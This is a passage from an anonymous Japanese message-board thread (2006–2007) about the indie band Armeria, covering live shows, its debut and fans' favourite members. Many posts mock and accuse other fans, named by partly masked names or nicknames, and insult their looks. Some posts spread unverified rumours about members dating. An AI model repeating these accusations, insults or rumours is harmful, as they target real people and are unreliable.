そうそう!!でも来月は夕方だよね。
羅犬被るとか大変だな〜。それも新宿と川崎とか…

121 :名無しさん@お腹いっぱい。:2006/11/14(火) 16:31:56 ID:/Hv4QhRb0
噴水広場ってクラブチッタ横の
ラチッタデッラの真ん中にある普段は噴水のところ
たまに噴水止めてイベントに使ってるよ

122 :名無しさん@お腹いっぱい。:2006/11/14(火) 22:19:59 ID:BEoaY7ORO
問題はラヂオだってw

123 :名無しさん@お腹いっぱい。:2006/11/14(火) 22:27:39 ID:FqaK9Ic5O
問題はラジオって?

124 :名無しさん@お腹いっぱい。:2006/11/14(火) 23:17:12 ID:BEoaY7ORO
スマソ、ラヂオあるから早く帰らなきゃぢゃん?

125 :名無しさん@お腹いっぱい。:2006/11/14(火) 23:24:16 ID:FqaK9Ic5O
ラジオって生じゃないから平気なんじゃない?

126 :名無しさん@お腹いっぱい。:2006/11/14(火) 23:51:13 ID:BEoaY7ORO
スマソ…漏れが帰らねば!だネ☆


127 :名無しさん@お腹いっぱい。:2006/11/15(水) 01:51:19 ID:DdSKwdtWO
そうだねww
漏れも帰らなくちゃ☆

128 :名無しさん@お腹いっぱい。:2006/11/15(水) 02:02:10 ID:NytGRnU8O
ラジオは生じゃないの?
また確信もない情報ですか?ワラ

アナタ 消えてくださーい\(^∇^)/

129 :名無しさん@お腹いっぱい。:2006/11/15(水) 02:35:06 ID:DdSKwdtWO
普通に考えてラジオは生じゃなくない?それに夜だし…。

それだけで消えろとかうざいwww

130 :名無しさん@お腹いっぱい。:2006/11/15(水) 02:56:09 ID:Em7UeGP5O
生放送ではないっしょ。顔文字のがウザスと思うけどw

131 :名無しさん@お腹いっぱい。:2006/11/17(金) 02:45:16 ID:dpjGiQMTO
天気晴れるかな

132 :名無しさん@お腹いっぱい。:2006/11/17(金) 09:23:51 ID:Dakv2bI3O
きっと晴れるよぉ

133 :名無しさん@お腹いっぱい。:2006/11/17(金) 21:03:53 ID:D9/RnV+oO
明日ライブだね。
みんな川崎と新宿2つ行くの?

134 :名無しさん@お腹いっぱい。:2006/11/18(土) 19:13:35 ID:frrPRFkjO
最近思う事
オフィに匿名多すぎ
。とか☆とか
2チャソぢゃあるまいし
自分の名前も出せないの?


135 :名無しさん@お腹いっぱい。:2006/11/19(日) 22:49:53 ID:s8SGTM5lO
ここってレポとかないけどライブ行ってる子は見てないのかな?
あんまりライブ行けないからレポとかあったらいいのになぁ。

136 :名無しさん@お腹いっぱい。:2006/11/19(日) 23:31:29 ID:JWWCFYbBO
レポ落としたら正体バレないか不安なんじゃない?

137 :名無しさん@お腹いっぱい。:2006/11/20(月) 00:00:17 ID:s8SGTM5lO
そうなのかな?
バレたら気まずいもんねー。

138 :名無しさん@お腹いっぱい。:2006/11/20(月) 01:57:01 ID:21CAadRBO
>>135
間違いなくいるって、〇みや〇ゆ^^
固定以外もいるだろうが、康平やファン叩きしてる香具師は必死だな^^

139 :名無しさん@お腹いっぱい。:2006/11/21(火) 15:44:59 ID:ikf2I86SO
>>135レポはオフィでま〇=山〇がやってんじゃん。(゚ω゚)いくつ名前使ってんだよって(笑)

某箱でオキニ見たんだけどさ、変わりなく可愛いけど何か印象変わったね。全然笑わないし..ロリは普通だったけど。同じ盤ファン仲間だからちょっと心配(^ε^;)

140 :名無しさん@お腹いっぱい。:2006/11/22(水) 16:47:39 ID:QRJC91nkO
アルメリアは誰が1番ファンいるの?

141 :名無しさん@お腹いっぱい。:2006/11/22(水) 22:19:22 ID:CFHGNV9XO
そりゃ太鼓ヒデキだんべ

142 :名無しさん@お腹いっぱい。:2006/11/23(木) 15:20:18 ID:l+Agd3JXO
>>140
断トツで英樹!英樹萌え☆(^ε^)
ま〇みとオキニって仲悪いの?ただ親しくないだけかな?

143 :名無しさん@お腹いっぱい。:2006/11/24(金) 21:03:07 ID:n6aMt4ThO
↑関係なくない??
康平のオキニなんていません。ただの不安。オキニなんて書くと、勘違いするゾ?

144 :名無しさん@お腹いっぱい。:2006/11/24(金) 21:28:20 ID:L56kPa1IO
何の勘違い?
某盤で俊介のオキニ話も出たけど、そんなの本人にしかわからなくない?
可愛い=オキニとは限らない。

145 :名無しさん@お腹いっぱい。:2006/11/25(土) 22:05:07 ID:g6OVgW70O
>>143
ゆ〇かま〇?粘着止めなよ|艸∀・`)

146 :名無しさん@お腹いっぱい。:2006/11/27(月) 01:04:30 ID:dIXqlQ0ZO
俊介オキニって何-?ギタ-少年(・∀・)不安の漏れに教えてけれ★★ま〇みッテ英樹のオキニぢゃないの?漏れはヌサだから無理だぽ・・・ま〇みやあのカワユスみたいな顔に生まれたかったぉ(・∀・)

147 :名無しさん@お腹いっぱい。:2006/11/27(月) 01:36:07 ID:oRcwoJEI0
俊介!!(・∀・)俊介!!(・∀・)俊介!!(・∀・)

148 :名無しさん@お腹いっぱい。:2006/11/27(月) 15:05:45 ID:dIXqlQ0ZO
┣┫i・De・кΙも萌えχ2★俊介ネタ超キボン(・∀・)

149 :名無しさん@お腹いっぱい。:2006/11/27(月) 16:11:05 ID:1ZN8YKVAO
俊介と葉菜が付き合ってるって話聞いた事あるwww

150 :名無しさん@お腹いっぱい。:2006/11/28(火) 00:07:34 ID:TH59qKrG0
>>149
またありもしない事を…めんばカワイソす

151 :名無しさん@お腹いっぱい。:2006/11/28(火) 00:19:13 ID:yWFawZL2O
明らかに鼻ゎ輝にラブぢゃね?ww

152 :名無しさん@お腹いっぱい。:2006/11/29(水) 00:00:29 ID:wEiojH3UO
ほんとありもしないことばっかでメンバー可哀相だね。
はなが嫌いだからそーゆー事わざわざ言うわけ?
普通に応援してあげればいいじゃん。



153 :名無しさん@お腹いっぱい。:2006/11/29(水) 01:46:44 ID:OhijvT0eO
でもここマジバナも出てるよね、葉菜の話はどうか知らないけどさ〜
ま、よく知らないファンは知らないだろうから別にいいけどね(笑)

154 :名無しさん@お腹いっぱい。:2006/11/30(木) 21:20:49 ID:bAG0qruF0
ありえない…
妄想しすぎ…でたらめを書くなよ


155 :名無しさん@お腹いっぱい。:2006/12/01(金) 11:49:51 ID:iiAuUC2+O
ま〇みがオキニってまぢ?ムカつく・・カワユならまだわかるけど椰子は許せん(o^v^o)

156 :名無しさん@お腹いっぱい。:2006/12/01(金) 12:58:04 ID:mqJT1uh10
オキニとかないから…
メンバーは間近に迫ったデビューに向けて純粋にがんばってるんだから
おまえらも純粋に応援しろよ!

157 :名無しさん@お腹いっぱい。:2006/12/01(金) 13:08:07 ID:iiAuUC2+O
>>156
何で言い切れるの?ファンはみんな応援してるよ、それはそれで別物だよ。

158 :名無しさん@お腹いっぱい。:2006/12/01(金) 14:24:44 ID:mqJT1uh10
応援してるならなんでありもしない変な妄想話書くの?
そんなファン心理理解できないけど…

159 :名無しさん@お腹いっぱい。:2006/12/01(金) 21:48:57 ID:iiAuUC2+O
何が妄想なわけ?そんなのメンバーしかわからないじゃん、あんたま〇みかあのカワユですか?w

160 :名無しさん@お腹いっぱい。:2006/12/02(土) 18:43:33 ID:JiUBI8STO
グッドルッキン見てびびった
ラムレム解散してから見てなかったから
メジャーデビューなんだね

161 :名無しさん@お腹いっぱい。:2006/12/03(日) 09:09:07 ID:akf21hNhO
昨日どうだった?

162 :名無しさん@お腹いっぱい。:2006/12/04(月) 11:00:22 ID:o6qWrcYQ0
お前らキモイな・・・

163 :名無しさん@お腹いっぱい。:2006/12/04(月) 14:22:58 ID:SeRXd4l5O
ラムレム

164 :名無しさん@お腹いっぱい。:2006/12/04(月) 16:17:49 ID:TZld1TpLO
ま〇みはない
ありえない
あれはどう見ても平凡女子の典型w
ヒデキの笑顔大スチだオキニになりたひ(・∀・)

165 :名無しさん@お腹いっぱい。:2006/12/04(月) 20:54:54 ID:TrWhTpRJO
ファンからは叩かれるけどメンバーからは信用度高いよね
どこのバンドでも

166 :名無しさん@お腹いっぱい。:2006/12/04(月) 22:12:53 ID:TZld1TpLO
は?誰が?w

167 :名無しさん@お腹いっぱい。:2006/12/04(月) 22:52:57 ID:TrWhTpRJO
ま○み
2バンドのメンバー3人が言ってた
確かにメンバーから見れば2ちゃんで叩いてる奴とか見当つくしこれだけ言われてもBBS書いたりライブ行ってるから信用はある

168 :名無しさん@お腹いっぱい。:2006/12/04(月) 23:33:41 ID:TZld1TpLO
平凡って言っただけで漏れも叩いたうちに入るのか?w
一応仲良しだ(・∀・)
ゆ〇叩きありえなかったもんな、絶対仲間内だし
じゃなきゃ歯まで見ねぇよ、同じヒデキファンの誰かなのはわかるw
デカ目のカワユ叩いてるのは誰か漏れ目星つく、確実にあのブサ〇美だぉw
某盤でも嫌われまくり、漏れはその盤本命だからウザスw

169 :名無しさん@お腹いっぱい。:2006/12/05(火) 21:42:13 ID:ZD/nGo9VO
>>168
目星って(汗)
そんなの私だって感じてたょ、その盤ってSでしょ?〇美ゎそれ以外の盤でも嫌ワレ者だし,明らかに香具師しかいない(^◇^)

170 :名無しさん@お腹いっぱい。:2006/12/05(火) 22:16:55 ID:1EbURFCvO
そんなの皆わかってるよ

171 :名無しさん@お腹いっぱい。:2006/12/05(火) 23:49:25 ID:ZD/nGo9VO
>>170
だょね、間違いないと思われます(笑)

172 :名無しさん@お腹いっぱい。:2006/12/05(火) 23:50:25 ID:BgMdv5XRO
S盤のファソ話はSスレでやれ

Sのファソ潰し合いにこの盤は関係ないだろ


173 :名無しさん@お腹いっぱい。:2006/12/05(火) 23:59:17 ID:ZD/nGo9VO
だね,スマソ(汗)><
とにかく〇美は叩きやめなよ、〇み叩いてたのもアンタ?

174 :名無しさん@お腹いっぱい。:2006/12/07(木) 12:03:57 ID:awgq6gUKO
>>168
麺婆もさすがにそれは気づいてるよ?少なくとも一人は知ってたみたい。
あんなハデに悪口言うのあのデブスしかいないし、みんな知ってるから今さらだよ。〇みにもカワユスにもアイツが暴言吐いてるよ。どのバンドからも信用ゼロだし(笑)
ライヴもうすぐだね、楽しみ。

175 :名無しさん@お腹いっぱい。:2006/12/07(木) 16:52:46 ID:IQIb6qJEO
もう○美バンギャあがればいいのに!

どこの盤行っても嫌われ者なんだから

でも○美は涙ですぐ麺の気をひくからな

176 :名無しさん@お腹いっぱい。:2006/12/07(木) 18:28:12 ID:NUuUxEZRO
いい加減に汁

そんな話はサロンでやって下さい。


177 :名無しさん@お腹いっぱい。:2006/12/07(木) 21:46:10 ID:awgq6gUKO
>>175
そこまで言ったらアイツと同類になるからやめな。
私が言いたいのは〇みやカワユスの悪口言いふらすなって。本人に言えないからって2chで言うのは間違ってる。大体カワユスに対しては完璧に僻みじゃん。この話もうやめよ。

178 :名無しさん@お腹いっぱい。:2006/12/08(金) 06:09:06 ID:CEAB2BxFO
○美って可愛いですか?

179 :名無しさん@お腹いっぱい。:2006/12/08(金) 10:36:26 ID:ySfiSryHO
全っ然w
〇美知らないなんて藻舞ド新規かw
可愛いのはま〇みとカワユだぉ,特にカワユは目が大きくて漏れにとってはネ申。漏れ実は隠れ大不安だぉw
でも目合わせてくれないし,嫌われてるかもorz

180 :名無しさん@お腹いっぱい。:2006/12/09(土) 02:28:39 ID:9H8aRrbeO
>>180

あの娘に嫌われるような事したの?
私は別にそう思わないけどな〜?

麺もあの娘もアンタの事が眼中にないだけぢゃない?w
なぁんてねwゴメソ

181 :名無しさん@お腹いっぱい。:2006/12/09(土) 18:09:32 ID:o/bCi11BO
○美は知ってますよ。
ただ可愛いなんて私は思わなかったから

ま○みサンと美○。。。

○美も平仮名に変えると「ま○み」だから勘違いしましたwww

スマソ!!

182 :名無しさん@お腹いっぱい。:2006/12/09(土) 22:08:06 ID:9H8aRrbeO
なるほど!
そりゃ勘違いするねw

塚自分にレスアンしてるし…>>179に、ですた。

183 :名無しさん@お腹いっぱい。:2006/12/10(日) 21:20:09 ID:aW7CqaICO
ファンネタつまんない

他の話投下しろよw
つかファン叩くのとか、藻舞人生サミシスだな(^ω^)
叩いてる暇あるなら就職汁w

184 :名無しさん@お腹いっぱい。:2006/12/11(月) 00:02:08 ID:GVh6yzNvO
葉菜って超カワイイ!
いよいよメジャーデビューかぁ

185 :名無しさん@お腹いっぱい。:2006/12/11(月) 13:00:02 ID:eyF76vxVO
>>179
漏れはロリイタ派だぉ^^デカ目は目ヂカラありすぎでコワスw
漏れは前の目黒以来ライヌ行ってないんだけど、ロリイタってまだいるよね?
話題にないからサミシス・・・13日来てほしいな、お洒落さんだから頑張ってロリそう。萌えかもw
あの子太鼓ファソみたいだぉ。仲間だ!

186 :名無しさん@お腹いっぱい。:2006/12/13(水) 01:58:51 ID:BmOlQs1dO
今日CD発売だね!
楽しみ☆

187 :名無しさん@お腹いっぱい。:2006/12/14(木) 17:22:04 ID:WD0OQ5YeO
英樹くんカッコよかった!
やっぱり一番カッコ良くて性格もいい!

ま〇みはただのファンだよ、カワユスぢゃないし。誰かと勘違いしてない?

188 :名無しさん@お腹いっぱい。:2006/12/15(金) 22:27:09 ID:m6V1W8bDO
イケメンバンド・・・?
イケメンは英樹しかいませんけどw

189 :名無しさん@お腹いっぱい。:2006/12/17(日) 01:51:12 ID:Ta7FVJEvO
188
こだわるねぇ(笑)

別にバンドを褒められてるんだか良くない?
ほんとばかだねぇ(苦笑)

190 :名無しさん@お腹いっぱい。:2006/12/17(日) 16:06:16 ID:JImws+XHO
確かにw
バンドが誉められればメンバーもファンもうれしいはずなのにね?

191 :名無しさん@お腹いっぱい。:2006/12/17(日) 16:57:01 ID:BTRcEqziO
英樹ファンてなんでそんな必死なの?
そんなにファンが多いと思わせたいのかね。
いい加減スルーされてる事気付け


192 :名無しさん@お腹いっぱい。:2006/12/17(日) 21:53:20 ID:rGxH0oZ2O
オフィのまwって荒らしだろ、事務所も何とかしろよ。いるんだよなこういう粘着キモオタってw

193 :名無しさん@お腹いっぱい。:2006/12/18(月) 22:17:35 ID:VPafphCnO
ファンが荒らしってことは皆もそうなるんじゃね?

194 :名無しさん@お腹いっぱい。:2006/12/18(月) 23:43:52 ID:9hZ6yd5+O
確かにアルメリアは英樹くん不安多いぉw

漏れゎ顔もスチだけど、あの雰囲気がスチだ!

笑顔にはとろけてしまうw
痛くてスマソ!

(≧З≦)ラヴ



195 :名無しさん@お腹いっぱい。:2006/12/18(月) 23:52:40 ID:9hZ6yd5+O
今ホムペ見たんだけど、何の書き込みが削除されたの?知ってるシトいる?

シリタヒ(ΩДΩ)



196 :sage:2006/12/19(火) 10:03:25 ID:FVft2Im3O
>>195
私も知らないけど、スタのレス見る限り荒らしじゃない?
暴言があったから削除した、みたいな書き方してるよね。
まぁ私もまwって人ビミョーだけど(汗)

197 :名無しさん@お腹いっぱい。:2006/12/21(木) 02:37:42 ID:hyzMC7KoO
改名前に一回みて最近Y2Kでみたけど雰囲気変わったな。Ba可愛いくなったし。ただ物販にいたVoだかG?機嫌悪かった?似ててどっちだか見分けつかないけど、羅犬も落ち着きなかったな。いつもああなのか?

198 :名無しさん@お腹いっぱい。:2006/12/22(金) 23:32:19 ID:7WRD/RfwO
>>198
ぜんぜん別人ですけどw
不安ぢゃない人が見たらそーなのかww

199 :197:2006/12/24(日) 02:59:37 ID:WdB7R5GNO
よくわかんねーよ、どっちも頭黄色いし。なんかイラついてた感じにみえたぞ。

200 :名無しさん@お腹いっぱい。:2006/12/24(日) 03:23:03 ID:EJXRTdvpO
下呂温泉?

201 :名無しさん@お腹いっぱい。:2006/12/24(日) 04:26:25 ID:c2wSX9uGO
ボーカルさんってRAM∞REMの人?

202 :名無しさん@お腹いっぱい。:2006/12/24(日) 08:05:23 ID:4+U4Rv+0O
そうですよ

203 :名無しさん@お腹いっぱい。:2006/12/24(日) 11:22:46 ID:WdB7R5GNO
あ〜じゃあそっちだ、何か気にしてんのか落ち着きなかったヤツ

204 :名無しさん@お腹いっぱい。:2006/12/25(月) 13:51:26 ID:RkQJ7AReO
そうはみえなかったけどなぁ。藻前が意識過剰なんじゃない?

205 :名無しさん@お腹いっぱい。:2006/12/25(月) 16:30:09 ID:rDr0P0dMO
FATロリがいたからぢゃね?w

206 :名無しさん@お腹いっぱい。:2006/12/25(月) 17:51:10 ID:RkQJ7AReO
あんなブサに興味ないでしょ。ってかさ、ボーカルが〜とかさだから何?って感じなんだけど。

207 :名無しさん@お腹いっぱい。:2006/12/26(火) 15:34:13 ID:8eccSW9CO
ここの不安カワユって2人くらいしかいないw記念ライブで久振りにデカ目見たケドやつれてたね。他麺のギターとイチャついてたし・・・でもあのデカ目は羨ましいぉw

208 :名無しさん@お腹いっぱい。:2006/12/26(火) 20:57:57 ID:XVMTqQL/0
 

209 :名無しさん@お腹いっぱい。:2006/12/27(水) 01:59:48 ID:8V1mlgX5O
>>207
まぢ?あの子よくハグしてるよね、男女関係ないんぢゃない?
英樹くんにしたらキレますけどw

210 :名無しさん@お腹いっぱい。:2006/12/27(水) 03:47:39 ID:+pD0ORRW0
英樹さんにハグ
されたい。

211 :名無しさん@お腹いっぱい。:2006/12/27(水) 11:56:42 ID:8V1mlgX5O
されたいね!
でもデカ目だけはいやだ、カワユは許さないw
僻み上等(・∀・)

212 :名無しさん@お腹いっぱい。:2006/12/27(水) 14:18:53 ID:vy+V+kpEO
ってかカワユは居ないでしょ あれをカワユって…どれだけレベルが低いんだか ワラ

213 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:38:30 ID:8V1mlgX5O
そっかな〜ま〇みとデカ目はカワユだけどな、まぁ>>212よりはカワユじゃないw
もしかして本人登場?w(・∀・)

214 :名無しさん@お腹いっぱい。:2006/12/28(木) 09:41:04 ID:L5tPAFVgO
>>212
僻みにしか見えない…アンタま〇みとデカ目の悪口言って、葉菜ちゃんの事もブスって言ってる椰子?アンタのが明らかブスですから(汗)
美意識がズレてるのかな可哀想。

215 :名無しさん@お腹いっぱい。:2006/12/28(木) 21:18:49 ID:1NDuUuq1O
212ですけど、葉菜ちゃんは可愛いよ。
ま〇みも可愛いとは思うけど、そんな妬む程可愛いファンなんか居ないし。
これから芸能人と関わり合ってくバンドなのに、今のファンとアイドルと、比べたらどれだけレベルの低い話なんだかわからないかな?
ちなみに私はメンバーに恋愛感情とかないので心配無用ですよ。
歌と曲が好きなだけですから。
せいぜい少ないファン同士で妬み合ってて下さいよ

216 :名無しさん@お腹いっぱい。:2006/12/28(木) 22:10:17 ID:L5tPAFVgO
>>215
誰か察しついたな〜(笑)
さすがにこれはメンバーも気付くだろうな

217 :名無しさん@お腹いっぱい。:2006/12/28(木) 23:40:07 ID:jznSlKJaO
>>215
あ〜あ、

218 :名無しさん@お腹いっぱい。:2006/12/29(金) 03:45:44 ID:1byhgXOHO
初めまして!
誰か分かるとかって誰ですかぁ?(>_<)
私初めてなので、教えて下さい。

219 :名無しさん@お腹いっぱい。:2006/12/29(金) 09:48:18 ID:Yre+RKHzO
うわぁ、やっちゃったよ…

220 :名無しさん@お腹いっぱい。:2006/12/29(金) 11:26:28 ID:LMpoCYtgO
>>218
誰かわからないなら聞いてもわからないでしょ(^^;)
…勘いい子や麺にゎ分かるかもね。
ま〇みやロリではないでしょ、ま〇みゎ……だしね★訳あるし(^^)vデカ目さんゎ直球だろうし、ロリゎ英樹ファンなんでしょ!?
心あたりが3人くらいいて誰かわからない!(TT)

221 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:05:27 ID:ehcccmUQ0
正直どうでもいい

バンドの作る音楽について語れるファンは1人も居ないのかここのバンドは

222 :名無しさん@お腹いっぱい。:2006/12/29(金) 22:55:17 ID:LMpoCYtgO
ヒント:2ch

223 :名無しさん@お腹いっぱい。:2006/12/30(土) 15:59:10 ID:U6vmFev/O
おい222!
ヒントとかうぜーよ!
2chだからとか関係ないから!
どこもかしこもこんなんばかりだとか思ってるんじゃねーの?
2chだって、普通に音楽の話とかまじめに話してるとこなんかいっぱいあるんだよ!

そーゆー風に話したいやつだって、お前みたいのがいたら誰も話したくなくなるの当たり前だろ。
どーせ、私の書き込みも、頭悪過ぎて理解出来ないんじゃないの?


224 :名無しさん@お腹いっぱい。:2006/12/30(土) 16:18:40 ID:wvf0tkarO
梅だっけ?前いたコテ
康平くんが必死、って言うのはちょっとわかるかも。
嘘つけないもんね。
結局は人間関係なんだよ。

225 :名無しさん@お腹いっぱい。:2006/12/30(土) 20:56:13 ID:13LL1G7pO
ヒント:動員10人

226 :名無しさん@お腹いっぱい。:2007/01/02(火) 02:49:58 ID:67nKLiZLO
あけおめ〜(*´ω`*)

227 :名無しさん@お腹いっぱい。:2007/01/04(木) 18:20:12 ID:rvKAC6h3O
アルメリア最高!
かっこいい!

228 :名無しさん@お腹いっぱい。:2007/01/04(木) 22:31:02 ID:IapKTJFVO
英樹、STRUSHでたたくらしいね!?ビックリした!!

229 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:01:44 ID:pcPwm9psO
英樹さん頑張れ!

230 :名無しさん@お腹いっぱい。:2007/01/06(土) 00:41:38 ID:7MjxsYIwO
これでまた英樹のレベルが上がるwww

231 :名無しさん@お腹いっぱい。:2007/01/06(土) 21:38:54 ID:tuC0hwQI0
英樹は間違いなく、売れっ子ドラマーになる。

232 :名無しさん@お腹いっぱい。:2007/01/06(土) 21:41:55 ID:ujeu33ahO
英樹さんもみんなかっこいい!アルメリア素敵!

233 :名無しさん@お腹いっぱい。:2007/01/06(土) 21:42:01 ID:o+66+99K0
メジャーなの?

234 :名無しさん@お腹いっぱい。:2007/01/07(日) 03:01:58 ID:224HQpkTO
どれだけ人来るのかなぁ?

235 :名無しさん@お腹いっぱい。:2007/01/09(火) 23:56:12 ID:7LlZ4BN4O
俊A王子ダイスキ!

236 :名無しさん@お腹いっぱい。:2007/01/10(水) 00:06:18 ID:M1rOqUcM0
朝PV流れてた@埼玉

237 :名無しさん@お腹いっぱい。:2007/01/10(水) 10:56:23 ID:Rpz2s/Z4O
英樹と俊介かっこいい!
ここのメンバー彼女いるの?
葉菜は輝にラヴっぽいよね。

238 :名無しさん@お腹いっぱい。:2007/01/10(水) 22:41:40 ID:RWSKoZ1uO
康平もカッコイイっていってあげなよワラ

239 :名無しさん@お腹いっぱい。:2007/01/12(金) 01:55:09 ID:Ouo/2GEFO
誰も英樹には勝てません!

240 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:23:51 ID:8efxplRRO
勝てる勝てないじゃなくて、康平カッコイイっていってあげてワラ

241 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:25:17 ID:8efxplRRO
康平カッコイイよワラ逆にしかならんねケラケラケラケラ ケタケタケタ

242 :名無しさん@お腹いっぱい。:2007/01/14(日) 03:27:38 ID:8efxplRRO
軽く荒らしちゃったワラ 藁 和良 奈良 …寒い 寒すぎるからまたね〜(*^−')ノみんな仲良くアルメリア応援しろ!!

243 :名無しさん@お腹いっぱい。:2007/01/14(日) 16:49:19 ID:7NuTev1bO
>>242
連書きはいけません

244 :名無しさん@お腹いっぱい。:2007/01/14(日) 23:02:10 ID:UAMQdSC/O
>>241
逆ってなに?

245 :名無しさん@お腹いっぱい。:2007/01/15(月) 14:10:50 ID:tQFk3jSpO
逆ってぎゃぐと間違えたぁワラ

246 :名無しさん@お腹いっぱい。:2007/01/16(火) 01:06:17 ID:baJ8wlO9O
池は英樹だけですからワラ
まぢ他にいませんからw

247 :名無しさん@お腹いっぱい。:2007/01/16(火) 21:20:45 ID:sVZxDX660
何この糞スレ

248 :名無しさん@お腹いっぱい。:2007/01/16(火) 21:59:05 ID:baJ8wlO9O
英樹テラテラカッコヨス☆

249 :名無しさん@お腹いっぱい。:2007/01/16(火) 22:49:07 ID:9h/J5MvCO
英樹好きなのは良く分かったからさ、もうみっともない書き込みやめなよ。居ても書いてるの2〜3人だろ?こんな事書く為にあるスレじゃなかろーに。みっともないからほんとにやめてくんないかな。

250 :名無しさん@お腹いっぱい。:2007/01/17(水) 01:53:22 ID:IXZh8OnDO
>>241
なかなか失礼なヤツだww
みんな英樹不安だよね、ロリですら英樹不安みたいだしw
他麺不安が少ないのゎ事実!あ〇が俊介、デカ目が星くん不安なぐらいじゃね?

251 :名無しさん@お腹いっぱい。:2007/01/17(水) 03:10:33 ID:FTjjt4oT0
>>250
その「みんな」が2〜3人

252 :名無しさん@お腹いっぱい。:2007/01/17(水) 03:35:40 ID:IXZh8OnDO
とりあえず一番人気w

253 :名無しさん@お腹いっぱい。:2007/01/17(水) 15:18:25 ID:sIKgjMpoO
ファンの人数なんか別に良いじゃん…


254 :名無しさん@お腹いっぱい。:2007/01/18(木) 15:25:58 ID:hzIk7gBbO
だから、取りあえずそんな少人数でしかも、誰が書いてんのかなんてだいたいわかるわけだし。どーのこーの言うんなら、他にもっと客がつく様な事をここで言えばよくね?英樹が好きなら尚更だと思いますけど

255 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:45:36 ID:pd+lKk06O
2チャンでわざわざそんなの言うか?ww

ま〇が痛いぐらい別にww(・∀・)

256 :名無しさん@お腹いっぱい。:2007/01/19(金) 00:05:09 ID:13uGNanLO
バンドをちゃんと応援しようってやつはいないのかねぇ…

257 :名無しさん@お腹いっぱい。:2007/01/19(金) 08:28:18 ID:M2IO1Bi/O
ゆ〇いい加減に…

258 :名無しさん@お腹いっぱい。:2007/01/19(金) 15:50:04 ID:13uGNanLO
ゆ〇じゃないし…なんでもかんでもそーすりゃいーってもんじゃねぇだろ。
バカの一つ覚えだな。

259 :名無しさん@お腹いっぱい。:2007/01/19(金) 16:21:26 ID:zf6iEBuZO
>>258
熱くなるなよ。
スルーしとけってw

260 :名無しさん@お腹いっぱい。:2007/01/22(月) 02:29:44 ID:dFZ02yQIO
保守

261 :名無しさん@お腹いっぱい。:2007/01/25(木) 02:46:08 ID:UaYxmoQdO
英樹のサポート見たい!

262 :名無しさん@お腹いっぱい。:2007/01/27(土) 13:20:15 ID:hQiXIsBKO
スパのカオルの日記で見たんだけどGLORIAのYUKIと英樹って兄弟なの?

263 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:58:56 ID:p4sA2JQsO
英樹とテルテル以外
人気ないのはなんで?

あっイヤミかなw

264 :名無しさん@お腹いっぱい。:2007/01/28(日) 19:54:39 ID:YWvhDIIk0
今漏れもブログみたぞwwGLORIAのライブ行ったけどYUKIって子見てなかた(;_;)
どんな子か教えてww英樹似?

265 :名無しさん@お腹いっぱい。:2007/01/29(月) 07:58:13 ID:2XgZjQUjO
漏れも知りたいお(゜∀゜)
英樹Love↑

266 :名無しさん@お腹いっぱい。:2007/01/29(月) 12:51:51 ID:jhUlghROO
アルメリアでたまに見るお
青山兄弟兄Love

267 :名無しさん@お腹いっぱい。:2007/01/29(月) 15:36:09 ID:ZE6ONTb8O
英樹ゎアタシのなんでぇ〜ワラ

268 :名無しさん@お腹いっぱい。:2007/02/01(木) 03:10:56 ID:VPnwwGqqO
最近輝が王子様に見えて仕方ない!

269 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:43:32 ID:n5xnN+Tj0
輝が次郎に見える

270 :名無しさん@お腹いっぱい。:2007/02/04(日) 04:36:00 ID:qBXU1/x6O
ここの麺って、まだ繋がれるの?

271 :名無しさん@お腹いっぱい。:2007/02/05(月) 12:07:30 ID:dTciJ+XzO
263>>英樹と輝だけだって?ありえないなぁワラ ばかの一つ覚えも大概にしとけよ。

272 :名無しさん@お腹いっぱい。:2007/02/06(火) 12:08:06 ID:gbZrLVecO
英樹の弟っていくつ??

273 :名無しさん@お腹いっぱい。:2007/02/07(水) 01:34:15 ID:JmMAqEqYO
18

274 :名無しさん@お腹いっぱい。:2007/02/07(水) 09:25:11 ID:MKoPVx/UO
若っ。ということは高校生?

275 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:15:48 ID:IsgRTg68O
>>274
ド新規 乙

276 :名無しさん@お腹いっぱい。:2007/02/08(木) 03:35:58 ID:GL/grwKJ0
若っ。て俊介とほとんど変わらないじゃん。俊介19歳だよ

277 :名無しさん@お腹いっぱい。:2007/02/08(木) 10:55:01 ID:7Q5PJuELO
英樹と一緒に住んでるのかな??学生??ヒデキモエー(゜∀゜)

278 :名無しさん@お腹いっぱい。:2007/02/08(木) 15:36:36 ID:G4dN0UMDO
質問なんだけど、12月って13日と20日と31日以外、いつどこでライブしてたか覚えてる?

279 :名無しさん@お腹いっぱい。:2007/02/08(木) 22:28:51 ID:G4dN0UMDO
優しいファンいないー?教えてぇ

280 :名無しさん@お腹いっぱい。:2007/02/09(金) 02:19:40 ID:E+wdBYCFO
アルメリア不安に優しさ求めるな、キモい最前しかいやしねーw

281 :名無しさん@お腹いっぱい。:2007/02/11(日) 01:39:00 ID:ryHAEbrVO
久々にライブ行った〜w
不安も相変わらずだね、あのノリww
〇みがやつれてたのと、デカ目の雰囲気が変わってたのがちょっとビックリwww

282 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:53:36 ID:2tE6TbH9O
相変わらずのあのノリってなんだぁ?ワラ


283 :名無しさん@お腹いっぱい。:2007/02/17(土) 01:59:17 ID:kjEfTwrKO
エクレアきもい

284 :名無しさん@お腹いっぱい。:2007/02/18(日) 16:58:48 ID:J8M3WNhDO
いつもライブ行ってる人って
何人ぐらいいるの?
全体的に客多くないよね?

285 :名無しさん@お腹いっぱい。:2007/02/19(月) 00:39:18 ID:fmj1jn7PO
10人もいないよ!ってかエクレアは康平のラップがカッコイイ

286 :名無しさん@お腹いっぱい。:2007/02/19(月) 07:57:37 ID:XMLoqOtLO
康平はラップしない方がいい、キモさが増すだけ。鼻の声も完全に音負けしてた。
むしろエクレア以外の新曲を発売した方がいいと思う、康平はラップじゃない方がいい。
てゆーか全体的に最近キモいw

287 :名無しさん@お腹いっぱい。:2007/02/21(水) 05:49:35 ID:F6W0m78QO
ここの麺って彼女話出ないよねー
オキニ話は出るのにw
実際はいるのかな?


288 :名無しさん@お腹いっぱい。:2007/02/21(水) 23:17:44 ID:qCZO6tnCO
奇人は絶対 康平の身内

